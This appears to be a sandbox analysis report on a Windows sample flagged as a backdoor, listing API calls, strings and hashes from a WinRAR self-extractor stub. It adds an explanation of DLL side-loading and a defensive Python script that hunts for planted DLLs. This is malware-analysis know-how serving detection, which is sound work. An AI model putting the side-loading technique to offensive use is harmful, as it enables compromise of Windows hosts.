                                                • FindNextFileW.KERNEL32(?,?,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA692
                                                • GetLastError.KERNEL32(?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA69E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileFind$ErrorFirstLast$Next
                                                • String ID:
                                                • API String ID: 869497890-0
                                                • Opcode ID: 973e3793189f193660fea2e834e077707a1731b878f8ec53e9c2a506bc789a11
                                                • Instruction ID: 89efc1d0625645b9aa92bda550c31085dd11d5e7859f7ed111b3f580e52eca00
                                                • Opcode Fuzzy Hash: 973e3793189f193660fea2e834e077707a1731b878f8ec53e9c2a506bc789a11
                                                • Instruction Fuzzy Hash: D9416072505681EFC324EF78C884ADAF7F8BF48350F040A2AF599D3250D778A9548B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002,00000000), ref: 007F755E
                                                • TerminateProcess.KERNEL32(00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002,00000000), ref: 007F7565
                                                • ExitProcess.KERNEL32 ref: 007F7577
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: e04f8a80133179e156dbe446f858ebcbd3ba08af8c44c95328a43878392bb289
                                                • Instruction ID: 84f2e77e220a922572997347595ad2b4862c0bfc403496928858da07fa7c03b9
                                                • Opcode Fuzzy Hash: e04f8a80133179e156dbe446f858ebcbd3ba08af8c44c95328a43878392bb289
                                                • Instruction Fuzzy Hash: C1E0B631005A48EBDF55AF64DD0DA693B69FB44781F108414FA098B322CB39DE52DA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog_memcmp
                                                • String ID:
                                                • API String ID: 3004599000-0
                                                • Opcode ID: 84b1d31804a038a0510c63043142c598d2ba1ab9f8b14d3cdb157ed0fa1782e6
                                                • Instruction ID: 56a09f1de806cf078499e5abe4862ca51860e48d0c4a824d9327b8985bb84881
                                                • Opcode Fuzzy Hash: 84b1d31804a038a0510c63043142c598d2ba1ab9f8b14d3cdb157ed0fa1782e6
                                                • Instruction Fuzzy Hash: BB821A70904245EEDF65DB64C885BFABBB9BF05300F0841BBE9499B342DB395A48CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007EAEE5
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prologItemTextWindow
                                                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe$LICENSEDLG$P>b$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                • API String ID: 810644672-912058884
                                                • Opcode ID: 3506f9dbf26ce25577c283ff0cbdc102267382b782f430278f29c6beed1c7172
                                                • Instruction ID: 31025ff05378c3e9d74a018decc6327bc99bf36a083cd5b9b496f457e7d3de33
                                                • Opcode Fuzzy Hash: 3506f9dbf26ce25577c283ff0cbdc102267382b782f430278f29c6beed1c7172
                                                • Instruction Fuzzy Hash: 1542CEB0946294FEEB21ABA19C8AFEF3B7CFB09700F004455F645A62D1CB7C5944CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Control-flow Graph: [graph rendering omitted; basic blocks 0x7e00cf-0x7e0679, each marked executed or not executed]
                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32), ref: 007E00E4
                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007E00F6
                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007E0127
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007E03D4
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E03F0
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007E0402
                                                • ReadFile.KERNEL32(00000000,?,00007FFE,00803BA4,00000000), ref: 007E0421
                                                • CloseHandle.KERNEL32(00000000), ref: 007E0479
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007E048F
                                                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 007E04E7
                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 007E0510
                                                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 007E054A
                                                  • Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                  • Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                • _swprintf.LIBCMT ref: 007E05BE
                                                • _swprintf.LIBCMT ref: 007E060A
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • AllocConsole.KERNEL32 ref: 007E0612
                                                • GetCurrentProcessId.KERNEL32 ref: 007E061C
                                                • AttachConsole.KERNEL32(00000000), ref: 007E0623
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 007E0649
                                                • WriteConsoleW.KERNEL32(00000000), ref: 007E0650
                                                • Sleep.KERNEL32(00002710), ref: 007E065B
                                                • FreeConsole.KERNEL32 ref: 007E0661
                                                • ExitProcess.KERNEL32 ref: 007E0669
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                • API String ID: 1201351596-3298887752
                                                • Opcode ID: 672569b21f4462029c3f16eb68e86c3e8c54eda0bec0a46c137dfec849c9d237
                                                • Instruction ID: 5f86806a2426aea97e23a5d85224d67f789526708918ca85cba238913be5f531
                                                • Opcode Fuzzy Hash: 672569b21f4462029c3f16eb68e86c3e8c54eda0bec0a46c137dfec849c9d237
                                                • Instruction Fuzzy Hash: FDD161B1149784ABD3A09F91DC49B9FBAECFB85704F00491DF789D6290DBB4864C8B62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

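The function above is the stub's DLL-planting guard. It resolves SetDllDirectoryW and SetDefaultDllDirectories through GetProcAddress (so it still runs on older Windows), loads Crypt32.dll by its full path from GetSystemDirectoryW rather than by bare name, and then checks its own folder (GetModuleFileNameW + GetFileAttributesW) for DXGIDebug.dll, dwmapi.dll and uxtheme.dll. If one is present it prints "Please remove %s from %s folder. It is unsecure to run %s until it is done." to a console, sleeps 10 s (0x2710 ms) and exits, because those names are resolved through the normal DLL search order and a copy planted beside the executable would be loaded instead of the System32 one. The loader-side half of that mitigation cannot be shown portably, but the folder check can: the Python below is an added example, not Joe Sandbox output and not WinRAR code, that generalises the same check to every executable under a directory tree as a host-side hunt for staged side-loading. The three DLL names are taken from this report's String IDs; the directory layout it builds is a constructed fixture.

```python
"""Hunt for DLLs planted beside executables (added example)."""
import os
import pathlib
import tempfile
from typing import Dict, Iterable, List, Tuple

# Names the WinRAR SFX stub refuses to run next to (from this report's String IDs).
WATCHED_DLLS = ("DXGIDebug.dll", "dwmapi.dll", "uxtheme.dll")


def planted_dlls(exe_path: pathlib.Path,
                 watched: Iterable[str] = WATCHED_DLLS) -> List[pathlib.Path]:
    """Return watched DLLs present in exe_path's folder.

    Matching is case-insensitive, as Win32 path lookup is, so DWMAPI.DLL and
    dwmapi.dll are the same planted file.
    """
    folder = exe_path.parent
    present = {p.name.lower(): p for p in folder.iterdir() if p.is_file()}
    return [present[name.lower()] for name in watched if name.lower() in present]


def hunt(root: pathlib.Path,
         watched: Iterable[str] = WATCHED_DLLS) -> Dict[pathlib.Path, List[pathlib.Path]]:
    """Map each .exe under root to the watched DLLs beside it; clean folders are omitted."""
    hits: Dict[pathlib.Path, List[pathlib.Path]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".exe"):
                continue
            exe = pathlib.Path(dirpath) / name
            found = planted_dlls(exe, watched)
            if found:
                hits[exe] = found
    return hits


def build_fixture() -> Tuple[pathlib.Path, pathlib.Path]:
    """Constructed layout: one folder with a planted dwmapi.dll, one clean folder."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="dllhunt_"))
    dirty = root / "Downloads" / "setup"
    clean = root / "Program Files" / "Tool"
    dirty.mkdir(parents=True)
    clean.mkdir(parents=True)
    (dirty / "installer.exe").write_bytes(b"MZ")
    (dirty / "DWMAPI.DLL").write_bytes(b"MZ")   # planted; odd casing on purpose
    (dirty / "readme.txt").write_bytes(b"")
    (clean / "tool.exe").write_bytes(b"MZ")
    return root, dirty / "installer.exe"


if __name__ == "__main__":
    fixture_root, _ = build_fixture()
    for exe, dlls in hunt(fixture_root).items():
        print(f"{exe}: planted {', '.join(d.name for d in dlls)}")
```

Point it at user-writable locations where droppers land (Downloads, Temp, extracted archive folders); a hit does not prove compromise, but a dwmapi.dll or uxtheme.dll outside System32 has no legitimate reason to sit beside an installer.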
                                                 Control-flow Graph: [graph rendering omitted; basic blocks 0x7ebdf5-0x7eca9d, each marked executed or not executed]
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007EBDFA
                                                  • Part of subcall function 007EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007EAAFE
                                                • SetWindowTextW.USER32(?,?), ref: 007EC127
                                                • _wcsrchr.LIBVCRUNTIME ref: 007EC2B1
                                                • GetDlgItem.USER32(?,00000066), ref: 007EC2EC
                                                • SetWindowTextW.USER32(00000000,?), ref: 007EC2FC
                                                • SendMessageW.USER32(00000000,00000143,00000000,0081A472), ref: 007EC30A
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007EC335
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                • API String ID: 3564274579-312220925
                                                • Opcode ID: a10e25585427896f0f0ada2bb21935fe283f656f348d83d492738669c6f240c5
                                                • Instruction ID: 6aac3d8b9252ea112e70e6282f888189a33efc1b2cea1137a3e674c2a09bd7a6
                                                • Opcode Fuzzy Hash: a10e25585427896f0f0ada2bb21935fe283f656f348d83d492738669c6f240c5
                                                • Instruction Fuzzy Hash: AEE19176D01258EADB26DBA5DC49DEF777CBF08310F0040A6F609E3191EB789A85CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007DD346
                                                • _wcschr.LIBVCRUNTIME ref: 007DD367
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,007DD328,?), ref: 007DD382
                                                • __fprintf_l.LIBCMT ref: 007DD873
                                                  • Part of subcall function 007E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007DB652,00000000,?,?,?,0001041A), ref: 007E1396
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                • API String ID: 4184910265-980926923
                                                • Opcode ID: 6846c4ec9c3ef5d2bfa47197903d199ce6ee48304dbbac20910799ddfdfff58b
                                                • Instruction ID: 1925ce5728921edcc97bc0ea29bd7d70955d3f49662165c6bfe71f4fa674649d
                                                • Opcode Fuzzy Hash: 6846c4ec9c3ef5d2bfa47197903d199ce6ee48304dbbac20910799ddfdfff58b
                                                • Instruction Fuzzy Hash: 3E12B1B1900219DACF34DFA4DC95AEEB7B5FF44310F10456AE606A7381EB79AE44CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
                                                  • Part of subcall function 007EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
                                                  • Part of subcall function 007EAC74: IsDialogMessageW.USER32(0001041A,?), ref: 007EACAA
                                                  • Part of subcall function 007EAC74: TranslateMessage.USER32(?), ref: 007EACB8
                                                  • Part of subcall function 007EAC74: DispatchMessageW.USER32(?), ref: 007EACC2
                                                • GetDlgItem.USER32(00000068,0082ECB0), ref: 007ECB6E
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,007EA632,00000001,?,?,007EAECB,00804F88,0082ECB0), ref: 007ECB96
                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007ECBA1
                                                • SendMessageW.USER32(00000000,000000C2,00000000,008035B4), ref: 007ECBAF
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007ECBC5
                                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007ECBDF
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007ECC23
                                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007ECC31
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007ECC40
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007ECC67
                                                • SendMessageW.USER32(00000000,000000C2,00000000,0080431C), ref: 007ECC76
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                • String ID: \
                                                • API String ID: 3569833718-2967466578
                                                • Opcode ID: e429890a9a34df0902bcfb39bef8a6a38b5db1867a2787f41791d672f71c3360
                                                • Instruction ID: c64c597aa42ba95aea1fcaab22b3a2bedefd1fb43b21435295c997cb21e34d5d
                                                • Opcode Fuzzy Hash: e429890a9a34df0902bcfb39bef8a6a38b5db1867a2787f41791d672f71c3360
                                                • Instruction Fuzzy Hash: 1631CF71185B51BFE301DF20AC5AFAB7FACFB86704F000918F651962A1DB685908C7BA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • ShellExecuteExW.SHELL32(?), ref: 007ECF54
                                                • ShowWindow.USER32(?,00000000), ref: 007ECF93
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 007ECFCF
                                                • CloseHandle.KERNEL32(?), ref: 007ECFF5
                                                • ShowWindow.USER32(?,00000001), ref: 007ED084
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                • String ID: $.exe$.inf
                                                • API String ID: 3686203788-2452507128
                                                • Opcode ID: 6720969aa5c63271a31f17626ad64a83842f5b0cf029c05ff9a59dabd1eaef99
                                                • Instruction ID: 6849759ff1899d5a2e0c6c78b16893516f5e1225bcf5f137ad566bdc54809264
                                                • Opcode Fuzzy Hash: 6720969aa5c63271a31f17626ad64a83842f5b0cf029c05ff9a59dabd1eaef99
                                                • Instruction Fuzzy Hash: 0161F3754063C0DAD7329F66D8146ABBBE9FF89300F088819F5C097250D7B98D8ACB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F4E35,007F4E35,?,?,?,007FA2A9,00000001,00000001,3FE85006), ref: 007FA0B2
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007FA2A9,00000001,00000001,3FE85006,?,?,?), ref: 007FA138
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007FA232
                                                • __freea.LIBCMT ref: 007FA23F
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                • __freea.LIBCMT ref: 007FA248
                                                • __freea.LIBCMT ref: 007FA26D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: e9062ccab8d391b5810199b49617542d7f51d51f2b7d34cb19a13124aa6947f7
                                                • Instruction ID: 185b491158e7cde798edfb3cfe4487b2a589ed118eaa2d6fee0683578bb153f6
                                                • Opcode Fuzzy Hash: e9062ccab8d391b5810199b49617542d7f51d51f2b7d34cb19a13124aa6947f7
                                                • Instruction Fuzzy Hash: D251B3B271021EBFDB259F64CC45EBB77A9FB84760F154628FE08D6241DB39DC408662
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe,00000104), ref: 007F76FD
                                                • _free.LIBCMT ref: 007F77C8
                                                • _free.LIBCMT ref: 007F77D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
